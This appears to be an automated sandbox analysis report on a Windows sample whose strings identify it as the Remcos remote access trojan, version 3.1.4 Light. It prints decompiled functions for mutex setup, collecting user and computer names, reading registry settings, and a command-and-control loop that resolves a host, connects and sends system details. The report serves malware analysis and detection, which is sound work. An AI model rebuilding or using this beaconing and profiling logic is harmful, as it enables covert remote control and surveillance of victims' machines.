                                            0x0040929e
                                            0x004092a0
                                            0x004092a5
                                            0x004092af
                                            0x004092b4
                                            0x004092be
                                            0x004092c7
                                            0x004092cc
                                            0x004092d0
                                            0x004092d9
                                            0x004092de
                                            0x004092e4
                                            0x0040934b
                                            0x00409354
                                            0x00409389
                                            0x00409392
                                            0x0040939b
                                            0x004093b1
                                            0x004093c3
                                            0x004093c9
                                            0x004093cf
                                            0x004093d4
                                            0x00000000
                                            0x004093da
                                            0x004093da
                                            0x004093ea
                                            0x004093f0
                                            0x004093f5
                                            0x00409400
                                            0x00409405
                                            0x0040940e
                                            0x00409413
                                            0x0040941e
                                            0x00409427
                                            0x0040942c
                                            0x00409435
                                            0x0040943e
                                            0x00409437
                                            0x00409437
                                            0x00409437
                                            0x00409443
                                            0x00409448
                                            0x0040944d
                                            0x0040944f
                                            0x00409453
                                            0x00409453
                                            0x0040946e
                                            0x00409477
                                            0x00409480
                                            0x00409489
                                            0x0040949e
                                            0x004094a1
                                            0x004094ae
                                            0x004094b3
                                            0x004094b3
                                            0x004094b6
                                            0x004094b6
                                            0x004094b9
                                            0x004094bc
                                            0x004094bc
                                            0x004094c1
                                            0x004094c5
                                            0x004094d2
                                            0x004094e4
                                            0x004094e9
                                            0x004094fc
                                            0x00409505
                                            0x00409505
                                            0x004094c5
                                            0x0040950a
                                            0x00409517
                                            0x0040951c
                                            0x00409522
                                            0x00409527
                                            0x00409536
                                            0x00409538
                                            0x0040953d
                                            0x00409551
                                            0x00409556
                                            0x0040955c
                                            0x00409562
                                            0x00409564
                                            0x0040956a
                                            0x0040956c
                                            0x0040956e
                                            0x0040956e
                                            0x00000000
                                            0x0040956e
                                            0x00409566
                                            0x00409566
                                            0x00409570
                                            0x00409570
                                            0x0040957f
                                            0x0040957f
                                            0x00409585
                                            0x00409590
                                            0x00409595
                                            0x00409599
                                            0x0040959e
                                            0x004095a3
                                            0x004095a5
                                            0x004095a8
                                            0x004095a8
                                            0x004095b4
                                            0x004095b6
                                            0x004095bb
                                            0x004095bb
                                            0x004095bd
                                            0x004095cb
                                            0x00000000
                                            0x004095bf
                                            0x004095bf
                                            0x004095c2
                                            0x004095c4
                                            0x004095d0
                                            0x004095e4
                                            0x004095f3
                                            0x004095f8
                                            0x00409600
                                            0x00409604
                                            0x00409604
                                            0x004095c2
                                            0x00409609
                                            0x0040960e
                                            0x0040960f
                                            0x00409610
                                            0x00409615
                                            0x0040961a
                                            0x0040a702
                                            0x00409146
                                            0x00409152
                                            0x00409152
                                            0x004092e6
                                            0x004092e6
                                            0x004092ea
                                            0x00000000
                                            0x004092ec
                                            0x004092ec
                                            0x004092f0
                                            0x004092f2
                                            0x00000000
                                            0x004092f4
                                            0x004092f4
                                            0x004092f5
                                            0x004092fd
                                            0x00409301
                                            0x00409308
                                            0x00409312
                                            0x00409319
                                            0x0040931b
                                            0x0040931f
                                            0x00409324
                                            0x00409328
                                            0x0040932d
                                            0x00409331
                                            0x00409336
                                            0x0040933a
                                            0x00409343
                                            0x00409348
                                            0x00409348
                                            0x004092f2
                                            0x004092ea

                                            APIs
                                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E,00000000,004554E4,00000003,00000000), ref: 004093C3
                                            • GetLastError.KERNEL32 ref: 004093C9
                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\V8IB839cvz.exe,00000104), ref: 004093EA
                                            • CreateThread.KERNEL32(00000000,00000000,004124F8,00000000,00000000,00000000), ref: 0040957F
                                            • SetProcessDEPPolicy.KERNEL32(00000000,00000000,00000028), ref: 004095A8
                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00009834,00000000,00000000,00000000), ref: 004095B4
                                              • Part of subcall function 0040AF9D: __EH_prolog.LIBCMT ref: 0040AFA2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Create$Thread$ErrorFileH_prologLastModuleMutexNamePolicyProcess
                                            • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Users\user\Desktop\V8IB839cvz.exe$ProductName$Remcos$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$licence$licence_code.txt
                                            • API String ID: 1173649788-3518081510
                                            • Opcode ID: 7b1946215d0d28678788a544acc56e73eb7b1011ff91a4c51b6e38d517ba4a13
                                            • Instruction ID: 6f66e69223792d0dc9ff961cc2e93a354dc1b449c1548d5b416820075d40da73
                                            • Opcode Fuzzy Hash: 7b1946215d0d28678788a544acc56e73eb7b1011ff91a4c51b6e38d517ba4a13
                                            • Instruction Fuzzy Hash: 7281B3307443006ADA14BB729C67A7F27599B81709F50453FF402BB2E3EEBD9D05865E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00409834, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85sleepCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00409834() {
				signed int _v32;
				void* _t13;
				void* _t22;
				char* _t33;
				void* _t37;
				void* _t43;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t65;

				_t62 = (_t60 & 0xfffffff8) - 0x1c;
				_t33 = "3.1.4 Light";
				while(1) {
					_v32 = _v32 & 0x00000000;
					E0040B766(E00401F2E(0x461210), "override",  &_v32); // executed
					_t13 = _v32 - 1;
					if(_t13 == 0) {
						goto L5;
					}
					_t22 = _t13 - 1;
					if(_t22 == 0) {
						_t66 = _t62 - 0x1c;
						_t43 = _t62 - 0x1c;
						E004031DB(_t33, _t43, 0x460a98);
						_push(_t43);
						E0040B9BC(_t24, L00404090(E00411130( &_v32, 0x461210, __eflags)));
						E004031D1();
						_push(1);
						E0040207E(_t33, _t66 + 0x20 - 0x18, _t33);
						_push("v");
						E0040B917(0x461210, E00401F2E(0x461210));
						ExitProcess(0);
					}
					_t73 = _t22 != 1;
					if(_t22 != 1) {
						L6:
						Sleep(0xbb8); // executed
						continue;
					}
					E00407CBF();
					L5:
					_t63 = _t62 - 0x1c;
					_t37 = _t63;
					E004031DB(_t33, _t37, 0x460a98);
					_push(_t37);
					E0040B9BC(_t15, L00404090(E00411130( &_v32, 0x461210, _t73)));
					E004031D1();
					_push(1);
					_t65 = _t63 + 0x20 - 0x18;
					E0040207E(_t33, _t65, _t33);
					_push("v");
					E0040B917(0x461210, E00401F2E(0x461210));
					_t62 = _t65 + 0x20;
					goto L6;
				}
			}













                                            0x0040983a
                                            0x0040984a
                                            0x0040984f
                                            0x0040984f
                                            0x00409867
                                            0x00409872
                                            0x00409875
                                            0x00000000
                                            0x00000000
                                            0x00409877
                                            0x0040987a
                                            0x004098ea
                                            0x004098ed
                                            0x004098f0
                                            0x004098f5
                                            0x0040990a
                                            0x00409916
                                            0x0040991b
                                            0x00409923
                                            0x00409928
                                            0x00409936
                                            0x00409940
                                            0x00409940
                                            0x0040987c
                                            0x0040987f
                                            0x004098da
                                            0x004098df
                                            0x00000000
                                            0x004098df
                                            0x00409881
                                            0x00409886
                                            0x00409886
                                            0x00409889
                                            0x0040988c
                                            0x00409891
                                            0x004098a6
                                            0x004098b2
                                            0x004098b7
                                            0x004098b9
                                            0x004098bf
                                            0x004098c4
                                            0x004098d2
                                            0x004098d7
                                            0x00000000
                                            0x004098d7

                                            APIs
                                              • Part of subcall function 0040B766: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 0040B786
                                              • Part of subcall function 0040B766: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00461210), ref: 0040B7A4
                                              • Part of subcall function 0040B766: RegCloseKey.KERNELBASE(?), ref: 0040B7AF
                                            • Sleep.KERNELBASE(00000BB8), ref: 004098DF
                                            • ExitProcess.KERNEL32 ref: 00409940
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CloseExitOpenProcessQuerySleepValue
                                            • String ID: 3.1.4 Light$C:\Users\user\Desktop\V8IB839cvz.exe$override
                                            • API String ID: 2281282204-3096891110
                                            • Opcode ID: fa7eae86fd38236f277c8858c04383d6603ae5b5691934f46a07077f54549a84
                                            • Instruction ID: f4f28b010d9838272a1143410c24596c90ce4f3b2b475cf120c0eeccb3aab828
                                            • Opcode Fuzzy Hash: fa7eae86fd38236f277c8858c04383d6603ae5b5691934f46a07077f54549a84
                                            • Instruction Fuzzy Hash: C721A472B2420023C90877768D5B92F36999B86715F50483EB6017B2D7EF7D9E04839E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00410C6E, Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E00410C6E(void* __ecx, void* __edi, void* __eflags) {
				char _v8;
				long _v12;
				char _v36;
				char _v60;
				char _v92;
				short _v604;
				void* _t26;
				void* _t38;
				void* _t39;

				_t39 = __eflags;
				_v8 = 0x10;
				_t38 = __ecx;
				 *0x460e1c(1,  &_v92,  &_v8); // executed
				_v12 = 0x100;
				GetUserNameW( &_v604,  &_v12); // executed
				E00406D5F(_t26, _t38, E00408507(_t26,  &_v36,  &_v92, __edi, _t39, E004031DB(_t26,  &_v60, "/")), __edi, _t39,  &_v604);
				E004031D1();
				E004031D1();
				return _t38;
			}












                                            0x00410c6e
                                            0x00410c7b
                                            0x00410c86
                                            0x00410c8b
                                            0x00410c94
                                            0x00410ca3
                                            0x00410cce
                                            0x00410cd7
                                            0x00410cdf
                                            0x00410cea

                                            APIs
                                            • GetComputerNameExW.KERNEL32(00000001,?,00000028,73B743E0), ref: 00410C8B
                                            • GetUserNameW.ADVAPI32(?,0040958A), ref: 00410CA3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Name$ComputerUser
                                            • String ID:
                                            • API String ID: 4229901323-0
                                            • Opcode ID: ddc246d9779d83dfcaf6d92fe8ca7c36942c959acc9876bcd6c84412b1f71a54
                                            • Instruction ID: 0ae8c3448b18c7047315645d48c073d938e9492d26785b8b56668af5e3bb4cbf
                                            • Opcode Fuzzy Hash: ddc246d9779d83dfcaf6d92fe8ca7c36942c959acc9876bcd6c84412b1f71a54
                                            • Instruction Fuzzy Hash: F701FF71A0011CABCB04EB90DC55AEEBB7CEF48305F10057AF805B6191EEB46B898B98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040C730, Relevance: 28.7, APIs: 5, Strings: 11, Instructions: 711sleepnetworkCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 86%
                                            			E0040C730() {
				signed short _v8;
				char _v20;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v140;
				void* _v163;
				char _v164;
				char _v188;
				char _v212;
				char _v236;
				char _v260;
				char _v284;
				char _v308;
				char _v332;
				char _v356;
				char _v380;
				char _v404;
				char _v428;
				char _v452;
				char _v476;
				char _v500;
				char _v524;
				char _v548;
				char _v572;
				char _v596;
				char _v620;
				char _v644;
				char _v668;
				char _v692;
				char _v716;
				char _v740;
				char _v764;
				char _v788;
				char _v812;
				char _v836;
				char _v860;
				char _v884;
				char _v908;
				char _v932;
				char _v956;
				char _v980;
				char _v1004;
				char _v1028;
				char _v1052;
				char _v1076;
				char _v1100;
				char _v1124;
				char _v1148;
				char _v1172;
				char _v1196;
				char _v1220;
				char _v1244;
				char _v1268;
				char _v1292;
				char _v1316;
				char _v1340;
				char _v1364;
				char _v1388;
				char _v1412;
				char _v2412;
				signed int _t165;
				void* _t167;
				long _t171;
				void* _t173;
				signed char _t177;
				void* _t183;
				short _t194;
				void* _t196;
				void* _t197;
				void* _t199;
				long _t203;
				short _t208;
				void* _t209;
				void* _t211;
				void* _t224;
				void* _t233;
				void* _t234;
				void* _t237;
				intOrPtr* _t238;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t246;
				void* _t248;
				void* _t250;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t255;
				void* _t256;
				void* _t257;
				void* _t360;
				void* _t362;
				void* _t364;
				void* _t366;
				void* _t368;
				long _t372;
				void* _t373;
				intOrPtr _t374;
				char* _t394;
				void* _t611;
				void* _t661;
				signed short _t666;
				signed short _t669;
				void* _t679;
				void* _t680;
				void* _t681;
				void* _t682;
				void* _t683;
				void* _t684;
				void* _t685;
				void* _t686;
				void* _t688;
				void* _t689;
				void* _t693;
				void* _t694;
				void* _t695;
				void* _t696;
				void* _t697;
				long _t699;

				_push(_t373);
				E004020CF(_t373,  &_v80);
				E00410E32( &_v260, _t603);
				E004020CF(_t373,  &_v1412);
				_t661 = 0x461270;
				_t165 = E00432099(_t163, E00401F2E(E004031A1(0x461270, _t603, _t697, 0x29)));
				if(_t165 != 0) {
					_t372 = _t165 * 0x3e8;
					_t699 = _t372;
					Sleep(_t372);
				}
				_t680 = _t679 - 0x18;
				E0040207E(_t373, _t680, 0x45aedc);
				_t167 = E004031A1(_t661, _t603, _t699, 0);
				_t681 = _t680 - 0x18;
				E004020E6(_t373, _t681, _t603, _t699, _t167);
				E00411260( &_v32, _t603);
				_t682 = _t681 + 0x30;
				_t669 = 0;
				_v8 = 0;
				_t374 = 0;
				E004031A1(_t661, _t603, _t699, 0x3a);
				_t171 = E0040E637(_t699);
				_t700 = _t171;
				if(_t171 != 0) {
					E004031A1(_t661, _t603, _t700, 0x3a);
					_t360 = E00401F26();
					_t362 = E00401F2E(E004031A1(_t661, _t603, _t700, 0x3a));
					E004031A1(_t661, _t603, _t700, 0x39);
					_t364 = E00401F26();
					_t366 = E00401F2E(E004031A1(_t661, _t603, _t700, 0x39));
					E004031A1(_t661, _t603, _t700, 0x38);
					_t368 = E00401F26();
					E00401F2E(E004031A1(_t661, _t603, _t700, 0x38));
					_t603 = _t368;
					E0040156E(_t368, _t366, _t364, _t362, _t360);
					_t682 = _t682 + 0x10;
					_t669 = 0;
				}
				L4:
				_t683 = _t682 - 0x18;
				E0040207E(_t374, _t683, 0x45aee0);
				_t173 = E004031A1( &_v32, _t603, _t700, _t374);
				_t684 = _t683 - 0x18;
				E004020E6(_t374, _t684, _t603, _t700, _t173);
				E00411260( &_v20, _t603);
				_t682 = _t684 + 0x30;
				E004031A1( &_v20, _t603, _t700, 2);
				_t604 = "0";
				_t177 = E00403C62("0");
				asm("sbb al, al");
				 *0x460a61 =  ~_t177 + 1;
				E00401677(0x4613f8);
				if(_t669 >= 0 || E00403255( &_v32) > 1) {
					_t703 =  *0x4613f9 - 1;
					_t394 =  &_v80;
					if( *0x4613f9 != 1) {
						_push(0x4554cc);
					} else {
						_push(" (TLS)");
					}
					E00403BFE(_t374, _t394);
					_t685 = _t682 - 0x18;
					_t183 = E004031A1( &_v20, _t604, _t703, 1);
					_t603 = E00404095(_t374,  &_v128, E00402973(_t374,  &_v104, E004059DC( &_v56, "Connecting to ", _t703, E004031A1( &_v20, _t604, _t703, 0)), _t703, 0x45aee0), _t703, _t183);
					E00404095(_t374, _t685, _t187, _t703,  &_v80);
					_t686 = _t685 - 0x14;
					E0040207E(_t374, _t686, "[Info]");
					E00410B51(_t374);
					_t682 = _t686 + 0x30;
					E00401F97();
					E00401F97();
					E00401F97();
					_t669 = _v8;
				}
				_t194 = 2;
				 *0x460a68 = _t194;
				_t196 = E00401F2E(E004031A1( &_v20, _t603, _t703, 0));
				__imp__#52(_t196); // executed
				_t704 = _t196;
				if(_t196 != 0) {
					E0042BC80(0x460a6c,  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0xc)))),  *((short*)(_t196 + 0xa)));
					_t208 = E00432099(_t206, E00401F2E(E004031A1( &_v20, _t603, _t704, 1)));
					__imp__#9();
					_t682 = _t682 + 0xc - 0x10;
					 *0x460a6a = _t208;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t209 = E004016F4(_t603, _t208); // executed
					_t705 = _t209;
					if(_t209 != 0) {
						_t688 = _t682 - 0x18;
						_t211 = E004031A1( &_v20, _t603, _t705, 1);
						_t611 = E00404095(_t374,  &_v56, E00402973(_t374,  &_v212, E004059DC( &_v236, "Connected to  ", _t705, E004031A1( &_v20, _t603, _t705, 0)), _t705, 0x45aee0), _t705, _t211);
						E00404095(_t374, _t688, _t611, _t705,  &_v80);
						_t689 = _t688 - 0x14;
						E0040207E(_t374, _t689, "[Info]");
						E00410B51(_t374);
						E00401F97();
						E00401F97();
						E00401F97();
						E00401B86(0x4613f8, 0xa, 0);
						_v164 = 0;
						asm("stosd");
						_v8 = 1;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t224 = E00410D50(0x4613f8);
						_push(_t611);
						E0040C719( &_v164, "%I64u", _t224);
						E004031DB(_t374,  &_v128, 0x45595c);
						E004031DB(_t374,  &_v104, 0x45595c);
						E004331FF( &_v104,  *0x45f9c0,  &_v140, 0xa);
						E004020E6(_t374,  &_v188, _t611, _t705, E004031A1(0x461270, _t611, _t705, 1));
						_t233 = E00401F26();
						_t234 = E00401F2E(0x461258);
						_t237 = E0040B8A0(E00401F2E(0x461210), "name",  &_v2412, 0x104, _t234, _t233);
						_t693 = _t689 + 0x60;
						if(_t237 != 0) {
							E00403BFE(_t374,  &_v188,  &_v2412);
						}
						_t238 =  *0x460cd0; // 0x0
						_t666 = 0;
						_t707 = _t238;
						if(_t238 != 0) {
							_t666 =  *_t238() & 0x0000ffff;
						}
						E004031DB(_t374,  &_v56, "C:\Users\jones\Desktop\V8IB839cvz.exe");
						_t694 = _t693 - 0x18;
						_t241 = E004111F2(_t374,  &_v1388, 0x4611f8);
						_t242 = E0041107C(_t374,  &_v1364, _t666 & 0x0000ffff);
						_t243 = E004031A1( &_v20, _t666 & 0x0000ffff, _t707, 0);
						_t246 = E0041107C(_t374,  &_v1340, GetTickCount());
						_t248 = E0041107C(_t374,  &_v1316, E0041102C( &_v1340));
						_t250 = E004111F2(_t374,  &_v1268, E00410FF2( &_v1292));
						_t251 = E004111F2(_t374,  &_v1244,  &_v104);
						_t252 = E004111F2(_t374,  &_v1220,  &_v56);
						_t253 = E004111F2(_t374,  &_v1196,  &_v128);
						_t255 = E004111F2(_t374,  &_v1172, 0x4614f8);
						_t256 = E00409947( &_v1148);
						_t454 =  &_v1124;
						_t257 = E004111F2(_t374,  &_v1124, 0x46127c);
						_t603 = E00404095(_t374,  &_v236, E00405870( &_v212, E00404095(_t374,  &_v284, E00405870( &_v308, E00404095(_t374,  &_v332, E00404095(_t374,  &_v356, E00404095(_t374,  &_v380, E00404095(_t374,  &_v404, E00404095(_t374,  &_v428, E00402973(_t374,  &_v452, E00404095(_t374,  &_v476, E00405870( &_v500, E00404095(_t374,  &_v524, E00405870( &_v548, E00404095(_t374,  &_v572, E00405992(_t374,  &_v596, E00404095(_t374,  &_v620, E00405870( &_v644, E00404095(_t374,  &_v668, E00405870( &_v692, E00404095(_t374,  &_v716, E00405870( &_v740, E00404095(_t374,  &_v764, E00405870( &_v788, E00404095(_t374,  &_v812, E00402973(_t374,  &_v836, E00404095(_t374,  &_v860, E00402973(_t374,  &_v884, E00404095(_t374,  &_v908, E00405870( &_v932, E00404095(_t374,  &_v956, E00404095(_t374,  &_v980, E00404095(_t374,  &_v1004, E00405870( &_v1028, E00404095(_t374,  &_v1052, E00405870( &_v1076, E004040B9( &_v1100,  &_v188), _t454), _t707, _t257), 0x46103c), _t707, _t256), _t707, 0x46103c), _t707, 0x4612ac), 0x46103c), _t707, _t255), _t707, 0x46103c), _t707,  &_v164), _t707, 0x46103c), _t707, "3.1.4 Light"), 0x46103c), _t707, _t253), 0x46103c), _t707, _t252), 0x46103c), _t707, _t251), 0x46103c), _t707, _t250), 0x46103c, _t707, 0x46103c), _t707, 0x30), 0x46103c), _t707, _t248), 0x46103c), _t707, _t246), _t707, 0x46103c), _t707,  &_v140), _t707, 0x46103c), _t707, _t243), _t707, 0x46103c), _t707, 0x461240), 0x46103c), _t707, _t242), 0x46103c), _t707, _t241);
						E00404095(_t374, _t694, _t294, _t707, 0x46103c);
						E00401790(_t374, 0x4613f8, _t294, _t707, 0x4b,  &_v260);
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E004031D1();
						E00401F97();
						E00401F97();
						E00401F97();
						E00401F97();
						E004031D1();
						E00403BB8(E004018AA(0x4613f8, _t294, E0040D14F, 1));
						_t695 = _t694 - 0x18;
						E0040207E(_t374, _t695, "Disconnected!");
						_t696 = _t695 - 0x18;
						E0040207E(_t374, _t696, "[Info]");
						E00410B51(_t374);
						_t682 = _t696 + 0x30;
						E00401F97();
						E004031D1();
						E004031D1();
					}
					_t669 = _v8;
					_t661 = 0x461270;
				}
				_t669 = _t669 - 1;
				_v8 = _t669;
				_t374 = _t374 + 1;
				_t197 = E00403255( &_v32);
				_t708 = _t374 - _t197;
				if(_t374 >= _t197) {
					_t199 = 2;
					_t374 = 0;
					_t203 = E00432099(_t200, E00401F2E(E004031A1(_t661, _t603, _t708, _t199))) * 0x3e8;
					_t700 = _t203;
					Sleep(_t203); // executed
				}
				E004031CC( &_v20);
				goto L4;
			}






























































































































                                            0x0040c73c
                                            0x0040c73f
                                            0x0040c74a
                                            0x0040c755
                                            0x0040c75a
                                            0x0040c770
                                            0x0040c778
                                            0x0040c77a
                                            0x0040c77a
                                            0x0040c781
                                            0x0040c781
                                            0x0040c787
                                            0x0040c791
                                            0x0040c79a
                                            0x0040c79f
                                            0x0040c7a5
                                            0x0040c7ad
                                            0x0040c7b2
                                            0x0040c7b5
                                            0x0040c7b9
                                            0x0040c7bc
                                            0x0040c7c0
                                            0x0040c7c7
                                            0x0040c7cc
                                            0x0040c7ce
                                            0x0040c7d4
                                            0x0040c7db
                                            0x0040c7ec
                                            0x0040c7f6
                                            0x0040c7fd
                                            0x0040c80e
                                            0x0040c818
                                            0x0040c81f
                                            0x0040c831
                                            0x0040c836
                                            0x0040c83a
                                            0x0040c83f
                                            0x0040c842
                                            0x0040c842
                                            0x0040c844
                                            0x0040c844
                                            0x0040c84e
                                            0x0040c857
                                            0x0040c85c
                                            0x0040c862
                                            0x0040c86a
                                            0x0040c86f
                                            0x0040c877
                                            0x0040c87c
                                            0x0040c883
                                            0x0040c88f
                                            0x0040c893
                                            0x0040c898
                                            0x0040c89f
                                            0x0040c8b2
                                            0x0040c8b9
                                            0x0040c8bc
                                            0x0040c8c5
                                            0x0040c8be
                                            0x0040c8be
                                            0x0040c8be
                                            0x0040c8ca
                                            0x0040c8cf
                                            0x0040c8dd
                                            0x0040c917
                                            0x0040c91b
                                            0x0040c920
                                            0x0040c92a
                                            0x0040c92f
                                            0x0040c934
                                            0x0040c93a
                                            0x0040c942
                                            0x0040c94a
                                            0x0040c94f
                                            0x0040c94f
                                            0x0040c954
                                            0x0040c95a
                                            0x0040c967
                                            0x0040c96d
                                            0x0040c973
                                            0x0040c975
                                            0x0040c98a
                                            0x0040c9a4
                                            0x0040c9ab
                                            0x0040c9b1
                                            0x0040c9b4
                                            0x0040c9c1
                                            0x0040c9c2
                                            0x0040c9c3
                                            0x0040c9c4
                                            0x0040c9cc
                                            0x0040c9d1
                                            0x0040c9d3
                                            0x0040c9d9
                                            0x0040c9e7
                                            0x0040ca27
                                            0x0040ca2b
                                            0x0040ca30
                                            0x0040ca3a
                                            0x0040ca3f
                                            0x0040ca4a
                                            0x0040ca55
                                            0x0040ca60
                                            0x0040ca6b
                                            0x0040ca70
                                            0x0040ca81
                                            0x0040ca83
                                            0x0040ca86
                                            0x0040ca87
                                            0x0040ca88
                                            0x0040ca89
                                            0x0040ca8a
                                            0x0040ca8f
                                            0x0040ca9d
                                            0x0040caae
                                            0x0040cab7
                                            0x0040cacb
                                            0x0040cae5
                                            0x0040caf1
                                            0x0040caf9
                                            0x0040cb1c
                                            0x0040cb21
                                            0x0040cb26
                                            0x0040cb35
                                            0x0040cb35
                                            0x0040cb3a
                                            0x0040cb3f
                                            0x0040cb41
                                            0x0040cb43
                                            0x0040cb47
                                            0x0040cb47
                                            0x0040cb52
                                            0x0040cb57
                                            0x0040cb73
                                            0x0040cb87
                                            0x0040cb9e
                                            0x0040cbbb
                                            0x0040cbcf
                                            0x0040cbec
                                            0x0040cbfc
                                            0x0040cc0c
                                            0x0040cc1c
                                            0x0040cc3c
                                            0x0040cc4f
                                            0x0040cc5b
                                            0x0040cc61
                                            0x0040ce72
                                            0x0040ce76
                                            0x0040ce85
                                            0x0040ce90
                                            0x0040ce9b
                                            0x0040cea6
                                            0x0040ceb1
                                            0x0040cebc
                                            0x0040cec7
                                            0x0040ced2
                                            0x0040cedd
                                            0x0040cee8
                                            0x0040cef3
                                            0x0040cefe
                                            0x0040cf09
                                            0x0040cf14
                                            0x0040cf1f
                                            0x0040cf2a
                                            0x0040cf35
                                            0x0040cf40
                                            0x0040cf4b
                                            0x0040cf56
                                            0x0040cf61
                                            0x0040cf6c
                                            0x0040cf77
                                            0x0040cf82
                                            0x0040cf8d
                                            0x0040cf98
                                            0x0040cfa3
                                            0x0040cfae
                                            0x0040cfb9
                                            0x0040cfc4
                                            0x0040cfcf
                                            0x0040cfda
                                            0x0040cfe5
                                            0x0040cff0
                                            0x0040cffb
                                            0x0040d006
                                            0x0040d011
                                            0x0040d01c
                                            0x0040d027
                                            0x0040d032
                                            0x0040d03d
                                            0x0040d048
                                            0x0040d053
                                            0x0040d05e
                                            0x0040d069
                                            0x0040d074
                                            0x0040d07f
                                            0x0040d08a
                                            0x0040d095
                                            0x0040d0a0
                                            0x0040d0a8
                                            0x0040d0bb
                                            0x0040d0c0
                                            0x0040d0ca
                                            0x0040d0cf
                                            0x0040d0d9
                                            0x0040d0de
                                            0x0040d0e3
                                            0x0040d0ec
                                            0x0040d0f4
                                            0x0040d0fc
                                            0x0040d0fc
                                            0x0040d101
                                            0x0040d104
                                            0x0040d104
                                            0x0040d109
                                            0x0040d10d
                                            0x0040d110
                                            0x0040d111
                                            0x0040d116
                                            0x0040d118
                                            0x0040d11c
                                            0x0040d120
                                            0x0040d134
                                            0x0040d134
                                            0x0040d13c
                                            0x0040d13c
                                            0x0040d145
                                            0x00000000

                                            APIs
                                            • Sleep.KERNEL32(00000000,00000029,00000000,73B743E0,00461270), ref: 0040C781
                                              • Part of subcall function 00410B51: GetLocalTime.KERNEL32(00000000), ref: 00410B6B
                                            • gethostbyname.WS2_32(00000000), ref: 0040C96D
                                            • htons.WS2_32(00000000), ref: 0040C9AB
                                            • Sleep.KERNELBASE(00000000,00000002), ref: 0040D13C
                                              • Part of subcall function 0040B8A0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00461210), ref: 0040B8BC
                                              • Part of subcall function 0040B8A0: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040B8D5
                                              • Part of subcall function 0040B8A0: RegCloseKey.ADVAPI32(00000000), ref: 0040B8E0
                                            • GetTickCount.KERNEL32 ref: 0040CBAD
                                              • Part of subcall function 00401790: send.WS2_32(?,00000000,00000000,00000000), ref: 00401804
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep$CloseCountLocalOpenQueryTickTimeValuegethostbynamehtonssend
                                            • String ID: (TLS)$%I64u$3.1.4 Light$C:\Users\user\Desktop\V8IB839cvz.exe$Connected to $Connecting to $Disconnected!$[Info]$\YE$hF$name
                                            • API String ID: 2389529961-883308613
